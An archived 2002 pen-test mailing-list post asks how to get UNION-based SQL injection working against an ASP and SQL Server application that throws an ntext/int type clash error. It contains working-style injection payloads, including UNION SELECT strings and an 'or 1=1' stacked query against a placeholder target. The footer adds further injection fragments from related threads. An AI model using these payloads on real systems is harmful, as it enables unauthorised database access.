sql injection - operand type clash

From: mel (meling@scan-associates.net)
Date: 03/14/02

• Previous message: Mike Shaw: "Online commonly used password database"
• Next in thread: Kevin Spett: "Re: sql injection - operand type clash"
• Reply: Kevin Spett: "Re: sql injection - operand type clash"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Thu, 14 Mar 2002 12:23:15 +0800
From: mel <meling@scan-associates.net>
To: pen-test@securityfocus.com

Hi,

Instead of the usual 80040e07 regarding syntax error, I get the following:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
incompatible with int

I have tried

union select username,1,1,.... (20+ columns) from table
union select 1,username,1,1....
union select 1,1,username,1...

but they still give me the same errors. Is there any way to create the
query so that it will return the correct information?

I've also tried

union select convert(sql_variant,username),1,1,...

but it produced the same result as well.

My second problem is that I cannot execute this:

http://target/da.asp?userid=user' or 1=1; select * from information_schema.tables--

I get

Error Type:
ADODB.Recordset (0x800A0CB3)
Current Recordset does not support bookmarks. This may be a limitation of the
provider or of the selected cursortype.

Does this mean that the query has been passed to the SQL server, but it does
not know how to return the results? What can I do to execute the queries
successfully?

From other error messages that I got, the query is something like this:

SELECT username FROM table_name WHERE userid like %input% ORDER BY
username ASC.

Any help is greatly appreciated.

--mel

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

---

• Previous message: Mike Shaw: "Online commonly used password database"
• Next in thread: Kevin Spett: "Re: sql injection - operand type clash"
• Reply: Kevin Spett: "Re: sql injection - operand type clash"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: SQL INJECTION IN Coldfusion ... UNION file.cfm?id=4567 UNION SELECT TOP 3 FROM mrro-- ... >> Intelligence Alert ... For more information on SecurityFocus' SIA ... (Pen-Test) Re: SQL INJECTION IN Coldfusion ... You must use UNION ALL to get all the rows. ... Manipulating MS Sql Server using sql injection. ... For more information on SecurityFocus' SIA ... (Pen-Test) RE: SQL injection - get more values ... One solution is to try to find the exact columns to perform a union ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ... (Pen-Test) Re: sql injection - operand type clash ... > union select 1,username,1,1.... ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test) RE: CFM SQL injection ... You should better use union or alike get unauthorized data from the ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > pen-test  > 2002-03